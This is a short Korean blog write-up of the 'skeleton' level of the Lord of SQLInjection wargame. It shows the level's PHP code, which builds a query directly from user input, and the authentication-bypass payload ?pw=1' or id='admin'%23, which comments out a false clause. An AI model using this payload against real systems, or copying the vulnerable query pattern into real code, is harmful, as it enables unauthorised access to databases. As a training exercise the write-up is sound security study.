skeleton

wargame 🏴‍☠️ write-up/Lord of SQLInjection

skeleton

Kortsec1 2022. 4. 2. 17:39

<?php 
  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); 
  $query = "select id from prob_skeleton where id='guest' and pw='{$_GET[pw]}' and 1=0"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id'] == 'admin') solve("skeleton"); 
  highlight_file(__FILE__); 
?>

뒤에 거짓인 식이 있기에 이를 주석처리 해주어야 한다.

?pw=1' or id='admin'%23

'wargame 🏴‍☠️ write-up > Lord of SQLInjection' 카테고리의 다른 글

darkknight (0)	2022.04.02
golem (0)	2022.04.02
vampire (0)	2022.04.02
troll (0)	2022.04.02

현재글skeleton

관계자외 출입 금지

사이버전의 모든 것, jenkins, PowerShell, PortSwigger, 취약점, James Kettle, CIMOM, Win32_UserAccount, expandAtFiles, Get-CimInstance, Format-Table, Vulnerability, 2023 Top 10, Windows Management Instrumentation, Format-List, Format-Wide, web, Win32_OperatingSystem, 보안 서적, CVE-2024-23897,

Today :
Yesterday :

일	월	화	수	목	금	토
	1	2	3	4	5	6
7	8	9	10	11	12	13
14	15	16	17	18	19	20
21	22	23	24	25	26	27
28	29	30	31

보안

skeleton

'wargame 🏴‍☠️ write-up > Lord of SQLInjection' 카테고리의 다른 글

'wargame 🏴‍☠️ write-up/Lord of SQLInjection'의 다른글

티스토리툴바

skeleton

'wargame 🏴‍☠️ write-up > Lord of SQLInjection' 카테고리의 다른 글

'wargame 🏴‍☠️ write-up/Lord of SQLInjection'의 다른글

관련글

티스토리툴바